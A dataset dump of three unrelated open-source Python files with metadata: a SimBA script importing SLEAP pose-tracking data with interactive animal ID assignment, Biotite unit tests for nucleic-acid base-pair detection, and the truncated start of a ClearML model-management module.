indBpCordList.append([x_cord, y_cord, currCols[2]])\r\n cv2.circle(overlay, (int(x_cord), int(y_cord)), circleScale, currcolor, -1, lineType=cv2.LINE_AA)\r\n for loop, name in enumerate(indBpCordList):\r\n currstring = name[2]\r\n for substring in bp_cord_names:\r\n if substring in currstring:\r\n newstring = currstring.replace(substring, '')\r\n indBpCordList[loop][2] = newstring\r\n imWithCordsOnly = overlay.copy()\r\n chooseFrame = False\r\n if (chooseFrame == False) and (assignBpCords == True):\r\n sideImage = np.ones((int(height / 2), width, 3))\r\n cv2.putText(sideImage, 'Current video: ' + str(vidBasename), (10, int(spacingScale)),cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, 'Can you assign identities based on the displayed frame ?', (10, int(spacingScale * (addSpacer * 2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, 'Press \"x\" to display new, random, frame', (10, int(spacingScale * (addSpacer * 3))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3)\r\n cv2.putText(sideImage, 'Press \"c\" to continue to start assigning identities using this frame', (10, int(spacingScale * (addSpacer * 4))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255), 3)\r\n imageConcat = np.concatenate((overlay, sideImage), axis=0)\r\n imageConcat = np.uint8(imageConcat)\r\n cv2.imshow('Define animal IDs', imageConcat)\r\n k = cv2.waitKey(10)\r\n if k == ord('x'):\r\n cv2.destroyWindow('Define animal IDs')\r\n chooseFrame, assignBpCords = True, True\r\n frameNumber += 50\r\n elif k == ord('c'):\r\n chooseFrame, assignBpCords = False, False\r\n assigningIDs, completePromt, assigningIDs = True, False, True\r\n\r\n if assigningIDs == True:\r\n sideImage = np.ones((int(height / 2), width, 3))\r\n cv2.putText(sideImage, 'Double left mouse click on:', (10, int(spacingScale)), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, str(currIDList[currIDcounter]), (10, int(spacingScale * (addSpacer*2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3)\r\n imageConcat = np.concatenate((overlay, sideImage), axis=0)\r\n imageConcat = np.uint8(imageConcat)\r\n cv2.setMouseCallback('Define animal IDs', define_ID)\r\n cv2.imshow('Define animal IDs', imageConcat)\r\n cv2.waitKey(10)\r\n if currIDcounter >= len(currIDList):\r\n cv2.destroyWindow('Define animal IDs')\r\n assigningIDs, completePromt = False, True\r\n\r\n if completePromt == True:\r\n cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL)\r\n sideImage = np.ones((int(height/2), width, 3))\r\n cv2.putText(sideImage, 'Current video: ' + str(vidBasename), (10, int(spacingScale)), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, 'Are you happy with your assigned identities ?', (10, int(spacingScale * (addSpacer*2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, 'Press \"c\" to continue (to finish, or proceed to the next video)', (10, int(spacingScale * (addSpacer*3))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3)\r\n cv2.putText(sideImage, 'Press \"x\" to re-start assigning identities', (10, int(spacingScale * (addSpacer*4))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255, 255), 3)\r\n imageConcat = np.concatenate((overlay, sideImage), axis=0)\r\n imageConcat = np.uint8(imageConcat)\r\n cv2.imshow('Define animal IDs', imageConcat)\r\n k = cv2.waitKey(10)\r\n if k == ord('c'):\r\n cv2.destroyWindow('Define animal IDs')\r\n break\r\n if k == ord('x'):\r\n overlay = imWithCordsOnly.copy()\r\n ID_user_cords, currIDcounter = [], 0\r\n assigningIDs, completePromt = True, False\r\n\r\n print('Re-organizing pose data-frame based on user-assigned identities: ' + str(os.path.basename(vidFname)) + '....')\r\n\r\n for values in ID_user_cords:\r\n currClickedX, currClickedY, currClickedID = values[0], values[1], values[2]\r\n for bpCords in indBpCordList:\r\n currX, currY, ID = bpCords[0], bpCords[1], bpCords[2]\r\n currEuclidian = np.sqrt((currClickedX - currX) ** 2 + (currClickedY - currY) ** 2)\r\n EuclidDistanceList.append([currEuclidian, currClickedID, ID])\r\n euclidDf = pd.DataFrame(EuclidDistanceList)\r\n euclidDf.columns = ['Distance', 'clickID', 'pose_ID']\r\n for i in currIDList:\r\n minDistance = euclidDf.loc[euclidDf['clickID'] == i, 'Distance'].min()\r\n animalPoseID = euclidDf.loc[euclidDf['Distance'] == minDistance, 'pose_ID'].iloc[0]\r\n changeList.append([animalPoseID, i])\r\n for animal in changeList:\r\n currPoseName, newName = animal[0], animal[1]\r\n loop = 0\r\n for header in bpNameList:\r\n if header.startswith(currPoseName):\r\n newHeader = header.replace(currPoseName, newName)\r\n bpNameList[loop] = newHeader\r\n loop += 1\r\n currDf.columns = bpNameList\r\n outDf = pd.DataFrame()\r\n for name in currIDList:\r\n currCols = [col for col in currDf.columns if name in col]\r\n sliceDf = currDf[currCols]\r\n outDf = pd.concat([outDf, sliceDf], axis=1)\r\n outDfcols = list(outDf.columns)\r\n toBpCSVlist = []\r\n if poseEstimationSetting == 'user_defined':\r\n for i in outDfcols:\r\n currBpName = i[:-2]\r\n for identityNo in range(len(currIDList)):\r\n if str(currIDList[identityNo]) in currBpName:\r\n currBpName = currBpName + '_' + str(identityNo+1)\r\n toBpCSVlist.append(currBpName) if currBpName not in toBpCSVlist else toBpCSVlist\r\n f = open(bpNamesCSVPath, 'w+')\r\n for i in toBpCSVlist:\r\n f.write(i + '\\n')\r\n f.close\r\n MultiIndexCol = []\r\n\r\n print('@@@@@@@@@@@@@@@@@@@',len(outDf.columns))\r\n for column in range(len(outDf.columns)):\r\n MultiIndexCol.append(tuple(('SLEAP_multi', 'SLEAP_multi', outDf.columns[column])))\r\n outDf.columns = pd.MultiIndex.from_tuples(MultiIndexCol, names=['scorer', 'bodypart', 'coords'])\r\n outputCSVname = os.path.basename(vidFname).replace('.mp4', '.csv')\r\n outDf.to_csv(os.path.join(outputDfFolder, outputCSVname))\r\n print('Imported ', outputCSVname, 'to project.')\r\nprint('All multi-animal SLEAP .slp tracking files ordered and imported into SimBA project in CSV file format')\r\n\r\n\r\n", "sub_path": "simba/import_sleap_h5.py", "file_name": "import_sleap_h5.py", "file_ext": "py", "file_size_in_byte": 13373, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "configparser.ConfigParser", "line_number": 20, "usage_type": "call"}, {"api_name": "configparser.MissingSectionHeaderError", "line_number": 23, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "configparser.NoOptionError", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 65, "usage_type": "call"}, {"api_name": "simba.rw_dfs.rw_dfs.save_df", "line_number": 85, "usage_type": "call"}, {"api_name": "simba.rw_dfs.rw_dfs", "line_number": 85, "usage_type": "attribute"}, {"api_name": "simba.rw_dfs", "line_number": 85, "usage_type": "name"}, {"api_name": "cv2.EVENT_LBUTTONDBLCLK", "line_number": 94, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 97, "usage_type": "attribute"}, {"api_name": "simba.rw_dfs.rw_dfs.read_df", "line_number": 111, "usage_type": "call"}, {"api_name": "simba.rw_dfs.rw_dfs", "line_number": 111, "usage_type": "attribute"}, {"api_name": "simba.rw_dfs", "line_number": 111, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "errno.ENOENT", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.strerror", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 116, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 119, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 119, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 123, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 127, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 127, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 139, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 150, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 152, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 153, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 157, "usage_type": "call"}, {"api_name": "cv2.destroyWindow", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 167, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 168, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 168, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 169, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 171, "usage_type": "call"}, {"api_name": "cv2.setMouseCallback", "line_number": 172, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 173, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 174, "usage_type": "call"}, {"api_name": "cv2.destroyWindow", "line_number": 176, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 180, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 182, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 183, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 183, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 184, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 185, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 187, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 188, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 189, "usage_type": "call"}, {"api_name": "cv2.destroyWindow", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 221, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.MultiIndex.from_tuples", "line_number": 244, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 244, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "attribute"}]} +{"seq_id": "455250999", "text": "# This source code is part of the Biotite package and is distributed\n# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further\n# information.\n\nimport pytest\nimport numpy as np\nimport biotite.structure as struc\nimport biotite.structure.io as strucio\nfrom biotite.structure.basepairs import base_pairs\nfrom os.path import join\nfrom ..util import data_dir\n\n\ndef reversed_iterator(iter):\n \"\"\"\n Returns a reversed list of the elements of an Iterator.\n \"\"\"\n return reversed(list(iter))\n\n\n@pytest.fixture\ndef nuc_sample_array():\n return strucio.load_structure(join(data_dir(\"structure\"), \"1qxb.cif\"))\n\n@pytest.fixture\ndef basepairs(nuc_sample_array):\n \"\"\"\n Generate a test output for the base_pairs function.\n \"\"\"\n residue_indices, residue_names = struc.residues.get_residues(\n nuc_sample_array\n )[0:24]\n return np.vstack((residue_indices[:12], np.flip(residue_indices)[:12])).T\n\n\ndef check_output(computed_basepairs, basepairs):\n \"\"\"\n Check the output of base_pairs.\n \"\"\"\n\n # Check if basepairs are unique in computed_basepairs\n seen = set()\n assert (not any(\n (base1, base2) in seen) or (base2, base1 in seen)\n or seen.add((base1, base2)) for base1, base2 in computed_basepairs\n )\n # Check if the right number of basepairs is in computed_basepairs\n assert(len(computed_basepairs) == len(basepairs))\n # Check if the right basepairs are in computed_basepairs\n for comp_basepair in computed_basepairs:\n assert ((comp_basepair in basepairs) \\\n or (comp_basepair in np.flip(basepairs)))\n\n@pytest.mark.parametrize(\"unique_bool\", [False, True])\ndef test_base_pairs_forward(nuc_sample_array, basepairs, unique_bool):\n \"\"\"\n Test for the function base_pairs.\n \"\"\"\n computed_basepairs = base_pairs(nuc_sample_array, unique=unique_bool)\n check_output(nuc_sample_array[computed_basepairs].res_id, basepairs)\n\n\ndef test_base_pairs_forward_no_hydrogen(nuc_sample_array, basepairs):\n \"\"\"\n Test for the function base_pairs with the hydrogens removed from the\n test structure.\n \"\"\"\n nuc_sample_array = nuc_sample_array[nuc_sample_array.element != \"H\"]\n computed_basepairs = base_pairs(nuc_sample_array)\n check_output(nuc_sample_array[computed_basepairs].res_id, basepairs)\n\n@pytest.mark.parametrize(\"unique_bool\", [False, True])\ndef test_base_pairs_reverse(nuc_sample_array, basepairs, unique_bool):\n \"\"\"\n Reverse the order of residues in the atom_array and then test the\n function base_pairs.\n \"\"\"\n \n # Reverse sequence of residues in nuc_sample_array\n reversed_nuc_sample_array = struc.AtomArray(0) \n for residue in reversed_iterator(struc.residue_iter(nuc_sample_array)):\n reversed_nuc_sample_array = reversed_nuc_sample_array + residue\n \n computed_basepairs = base_pairs(\n reversed_nuc_sample_array, unique=unique_bool\n )\n check_output(\n reversed_nuc_sample_array[computed_basepairs].res_id, basepairs\n )\n\ndef test_base_pairs_reverse_no_hydrogen(nuc_sample_array, basepairs):\n \"\"\"\n Remove the hydrogens from the sample structure. Then reverse the \n order of residues in the atom_array and then test the function \n base_pairs.\n \"\"\"\n nuc_sample_array = nuc_sample_array[nuc_sample_array.element != \"H\"]\n # Reverse sequence of residues in nuc_sample_array\n reversed_nuc_sample_array = struc.AtomArray(0) \n for residue in reversed_iterator(struc.residue_iter(nuc_sample_array)):\n reversed_nuc_sample_array = reversed_nuc_sample_array + residue\n \n computed_basepairs = base_pairs(reversed_nuc_sample_array)\n check_output(\n reversed_nuc_sample_array[computed_basepairs].res_id, basepairs\n )\n", "sub_path": "tests/structure/test_basepairs.py", "file_name": "test_basepairs.py", "file_ext": "py", "file_size_in_byte": 3741, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "biotite.structure.io.load_structure", "line_number": 23, "usage_type": "call"}, {"api_name": "biotite.structure.io", "line_number": 23, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "util.data_dir", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 21, "usage_type": "attribute"}, {"api_name": "biotite.structure.residues.get_residues", "line_number": 30, "usage_type": "call"}, {"api_name": "biotite.structure.residues", "line_number": 30, "usage_type": "attribute"}, {"api_name": "biotite.structure", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.flip", "line_number": 52, "usage_type": "call"}, {"api_name": "biotite.structure.basepairs.base_pairs", "line_number": 59, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 54, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 54, "usage_type": "attribute"}, {"api_name": "biotite.structure.basepairs.base_pairs", "line_number": 69, "usage_type": "call"}, {"api_name": "biotite.structure.AtomArray", "line_number": 80, "usage_type": "call"}, {"api_name": "biotite.structure", "line_number": 80, "usage_type": "name"}, {"api_name": "biotite.structure.residue_iter", "line_number": 81, "usage_type": "call"}, {"api_name": "biotite.structure", "line_number": 81, "usage_type": "name"}, {"api_name": "biotite.structure.basepairs.base_pairs", "line_number": 84, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 72, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 72, "usage_type": "attribute"}, {"api_name": "biotite.structure.AtomArray", "line_number": 99, "usage_type": "call"}, {"api_name": "biotite.structure", "line_number": 99, "usage_type": "name"}, {"api_name": "biotite.structure.residue_iter", "line_number": 100, "usage_type": "call"}, {"api_name": "biotite.structure", "line_number": 100, "usage_type": "name"}, {"api_name": "biotite.structure.basepairs.base_pairs", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "317310942", "text": "import abc\nimport os\nimport tarfile\nimport zipfile\nfrom tempfile import mkdtemp, mkstemp\n\nimport pyparsing\nimport six\nfrom typing import List, Dict, Union, Optional, TYPE_CHECKING, Sequence\n\nfrom .backend_api import Session\nfrom .backend_api.services import models\nfrom pathlib2 import Path\nfrom .utilities.pyhocon import ConfigFactory, HOCONConverter\n\nfrom .backend_interface.util import validate_dict, get_single_result, mutually_exclusive\nfrom .debugging.log import get_logger\nfrom .storage.helper import StorageHelper\nfrom .utilities.enum import Options\nfrom .backend_interface import Task as _Task\nfrom .backend_interface.model import create_dummy_model, Model as _Model\nfrom .config import running_remotely, get_cache_dir\n\n\nif TYPE_CHECKING:\n from .task import Task\n\nARCHIVED_TAG = \"archived\"\n\n\nclass Framework(Options):\n \"\"\"\n Optional frameworks for output model\n \"\"\"\n tensorflow = 'TensorFlow'\n tensorflowjs = 'TensorFlow_js'\n tensorflowlite = 'TensorFlow_Lite'\n pytorch = 'PyTorch'\n caffe = 'Caffe'\n caffe2 = 'Caffe2'\n onnx = 'ONNX'\n keras = 'Keras'\n mknet = 'MXNet'\n cntk = 'CNTK'\n torch = 'Torch'\n darknet = 'Darknet'\n paddlepaddle = 'PaddlePaddle'\n scikitlearn = 'ScikitLearn'\n xgboost = 'XGBoost'\n parquet = 'Parquet'\n\n __file_extensions_mapping = {\n '.pb': (tensorflow, tensorflowjs, onnx, ),\n '.meta': (tensorflow, ),\n '.pbtxt': (tensorflow, onnx, ),\n '.zip': (tensorflow, ),\n '.tgz': (tensorflow, ),\n '.tar.gz': (tensorflow, ),\n 'model.json': (tensorflowjs, ),\n '.tflite': (tensorflowlite, ),\n '.pth': (pytorch, ),\n '.pt': (pytorch, ),\n '.caffemodel': (caffe, ),\n '.prototxt': (caffe, ),\n 'predict_net.pb': (caffe2, ),\n 'predict_net.pbtxt': (caffe2, ),\n '.onnx': (onnx, ),\n '.h5': (keras, ),\n '.hdf5': (keras, ),\n '.keras': (keras, ),\n '.model': (mknet, cntk, xgboost),\n '-symbol.json': (mknet, ),\n '.cntk': (cntk, ),\n '.t7': (torch, ),\n '.cfg': (darknet, ),\n '__model__': (paddlepaddle, ),\n '.pkl': (scikitlearn, keras, xgboost),\n '.parquet': (parquet),\n }\n\n @classmethod\n def _get_file_ext(cls, framework, filename):\n mapping = cls.__file_extensions_mapping\n filename = filename.lower()\n\n def find_framework_by_ext(framework_selector):\n for ext, frameworks in mapping.items():\n if frameworks and filename.endswith(ext):\n fw = framework_selector(frameworks)\n if fw:\n return (fw, ext)\n\n # If no framework, try finding first framework matching the extension, otherwise (or if no match) try matching\n # the given extension to the given framework. If no match return an empty extension\n return (\n (not framework and find_framework_by_ext(lambda frameworks_: frameworks_[0]))\n or find_framework_by_ext(lambda frameworks_: framework if framework in frameworks_ else None)\n or (framework, filename.split('.')[-1] if '.' in filename else '')\n )\n\n\n@six.add_metaclass(abc.ABCMeta)\nclass BaseModel(object):\n _package_tag = \"package\"\n\n @property\n def id(self):\n # type: () -> str\n \"\"\"\n The Id (system UUID) of the model.\n\n :return str: The model id.\n \"\"\"\n return self._get_model_data().id\n\n @property\n def name(self):\n # type: () -> str\n \"\"\"\n The name of the model.\n\n :return str: The model name.\n \"\"\"\n return self._get_model_data().name\n\n @name.setter\n def name(self, value):\n # type: (str) -> None\n \"\"\"\n Set the model name.\n\n :param str value: The model name.\n \"\"\"\n self._get_base_model().update(name=value)\n\n @property\n def comment(self):\n # type: () -> str\n \"\"\"\n The comment for the model. Also, use for a model description.\n\n :return str: The model comment / description.\n \"\"\"\n return self._get_model_data().comment\n\n @comment.setter\n def comment(self, value):\n # type: (str) -> None\n \"\"\"\n Set comment for the model. Also, use for a model description.\n\n :param str value: The model comment/description.\n \"\"\"\n self._get_base_model().update(comment=value)\n\n @property\n def tags(self):\n # type: () -> List[str]\n \"\"\"\n A list of tags describing the model.\n\n :return list(str): The list of tags.\n \"\"\"\n return self._get_model_data().tags\n\n @tags.setter\n def tags(self, value):\n # type: (List[str]) -> None\n \"\"\"\n Set the list of tags describing the model.\n\n :param value: The tags.\n\n :type value: list(str)\n \"\"\"\n self._get_base_model().update(tags=value)\n\n @property\n def config_text(self):\n # type: () -> str\n \"\"\"\n The configuration as a string. For example, prototxt, an ini file, or Python code to evaluate.\n\n :return str: The configuration.\n \"\"\"\n return _Model._unwrap_design(self._get_model_data().design)\n\n @property\n def config_dict(self):\n # type: () -> dict\n \"\"\"\n The configuration as a dictionary, parsed from the design text. This usually represents the model configuration.\n For example, prototxt, an ini file, or Python code to evaluate.\n\n :return str: The configuration.\n \"\"\"\n return self._text_to_config_dict(self.config_text)\n\n @property\n def labels(self):\n # type: () -> Dict[str, int]\n \"\"\"\n The label enumeration of string (label) to integer (value) pairs.\n\n\n :return dict: A dictionary containing labels enumeration, where the keys are labels and the values as integers.\n \"\"\"\n return self._get_model_data().labels\n\n @property\n def task(self):\n # type: () -> str\n \"\"\"\n Return the creating task id (str)\n\n :return str: Task ID\n \"\"\"\n return self._task or self._get_base_model().task\n\n @property\n def url(self):\n # type: () -> str\n \"\"\"\n Return the url of the model file (or archived files)\n\n :return str: Model file URL\n \"\"\"\n return self._get_base_model().uri\n\n @property\n def published(self):\n # type: () -> bool\n return self._get_base_model().locked\n\n @property\n def framework(self):\n # type: () -> str\n return self._get_model_data().framework\n\n def __init__(self, task=None):\n # type: (Task) -> None\n super(BaseModel, self).__init__()\n self._log = get_logger()\n self._task = None\n self._set_task(task)\n\n def get_weights(self, raise_on_error=False):\n # type: (bool) -> str\n \"\"\"\n Download the base model and return the locally stored filename.\n\n :param bool raise_on_error: If True and the artifact could not be downloaded,\n raise ValueError, otherwise return None on failure and output log warning.\n\n :return str: The locally stored file.\n \"\"\"\n # download model (synchronously) and return local file\n return self._get_base_model().download_model_weights(raise_on_error=raise_on_error)\n\n def get_weights_package(self, return_path=False, raise_on_error=False):\n # type: (bool, bool) -> Union[str, List[Path]]\n \"\"\"\n Download the base model package into a temporary directory (extract the files), or return a list of the\n locally stored filenames.\n\n :param bool return_path: Return the model weights or a list of filenames? (Optional)\n\n - ``True`` - Download the model weights into a temporary directory, and return the temporary directory path.\n - ``False`` - Return a list of the locally stored filenames. (Default)\n\n :param bool raise_on_error: If True and the artifact could not be downloaded,\n raise ValueError, otherwise return None on failure and output log warning.\n\n :return: The model weights, or a list of the locally stored filenames.\n \"\"\"\n # check if model was packaged\n if self._package_tag not in self._get_model_data().tags:\n raise ValueError('Model is not packaged')\n\n # download packaged model\n packed_file = self.get_weights(raise_on_error=raise_on_error)\n\n # unpack\n target_folder = mkdtemp(prefix='model_package_')\n if not target_folder:\n raise ValueError('cannot create temporary directory for packed weight files')\n\n for func in (zipfile.ZipFile, tarfile.open):\n try:\n obj = func(packed_file)\n obj.extractall(path=target_folder)\n break\n except (zipfile.BadZipfile, tarfile.ReadError):\n pass\n else:\n raise ValueError('cannot extract files from packaged model at %s', packed_file)\n\n if return_path:\n return target_folder\n\n target_files = list(Path(target_folder).glob('*'))\n return target_files\n\n def publish(self):\n # type: () -> ()\n \"\"\"\n Set the model to the status ``published`` and for public use. If the model's status is already ``published``,\n then this method is a no-op.\n \"\"\"\n\n if not self.published:\n self._get_base_model().publish()\n\n def _running_remotely(self):\n # type: () -> ()\n return bool(running_remotely() and self._task is not None)\n\n def _set_task(self, value):\n # type: (_Task) -> ()\n if value is not None and not isinstance(value, _Task):\n raise ValueError('task argument must be of Task type')\n self._task = value\n\n @abc.abstractmethod\n def _get_model_data(self):\n pass\n\n @abc.abstractmethod\n def _get_base_model(self):\n pass\n\n def _set_package_tag(self):\n if self._package_tag not in self.tags:\n self.tags.append(self._package_tag)\n self._get_base_model().edit(tags=self.tags)\n\n @staticmethod\n def _config_dict_to_text(config):\n # if already string return as is\n if isinstance(config, six.string_types):\n return config\n if not isinstance(config, dict):\n raise ValueError(\"Model configuration only supports dictionary objects\")\n try:\n try:\n text = HOCONConverter.to_hocon(ConfigFactory.from_dict(config))\n except Exception:\n # fallback json+pyhocon\n # hack, pyhocon is not very good with dict conversion so we pass through json\n import json\n text = json.dumps(config)\n text = HOCONConverter.to_hocon(ConfigFactory.parse_string(text))\n\n except Exception:\n raise ValueError(\"Could not serialize configuration dictionary:\\n\", config)\n return text\n\n @staticmethod\n def _text_to_config_dict(text):\n if not isinstance(text, six.string_types):\n raise ValueError(\"Model configuration parsing only supports string\")\n try:\n return ConfigFactory.parse_string(text).as_plain_ordered_dict()\n except pyparsing.ParseBaseException as ex:\n pos = \"at char {}, line:{}, col:{}\".format(ex.loc, ex.lineno, ex.column)\n six.raise_from(ValueError(\"Could not parse configuration text ({}):\\n{}\".format(pos, text)), None)\n except Exception:\n six.raise_from(ValueError(\"Could not parse configuration text:\\n{}\".format(text)), None)\n\n @staticmethod\n def _resolve_config(config_text=None, config_dict=None):\n mutually_exclusive(config_text=config_text, config_dict=config_dict, _require_at_least_one=False)\n if config_dict:\n return InputModel._config_dict_to_text(config_dict)\n\n return config_text\n\n\nclass Model(BaseModel):\n \"\"\"\n Represent an existing model in the system, search by model id.\n The Model will be read-only and can be used to pre initialize a network\n \"\"\"\n\n def __init__(self, model_id):\n # type: (str) ->None\n \"\"\"\n Load model based on id, returned object is read-only and can be connected to a task\n\n Notice, we can override the input model when running remotely\n\n :param model_id: id (string)\n \"\"\"\n super(Model, self).__init__()\n self._base_model_id = model_id\n self._base_model = None\n\n def get_local_copy(self, extract_archive=True, raise_on_error=False):\n # type: (bool, bool) -> str\n \"\"\"\n Retrieve a valid link to the model file(s).\n If the model URL is a file system link, it will be returned directly.\n If the model URL is points to a remote location (http/s3/gs etc.),\n it will download the file(s) and return the temporary location of the downloaded model.\n\n :param bool extract_archive: If True and the model is of type 'packaged' (e.g. TensorFlow compressed folder)\n The returned path will be a temporary folder containing the archive content\n :param bool raise_on_error: If True and the artifact could not be downloaded,\n raise ValueError, otherwise return None on failure and output log warning.\n :return str: a local path to the model (or a downloaded copy of it)\n 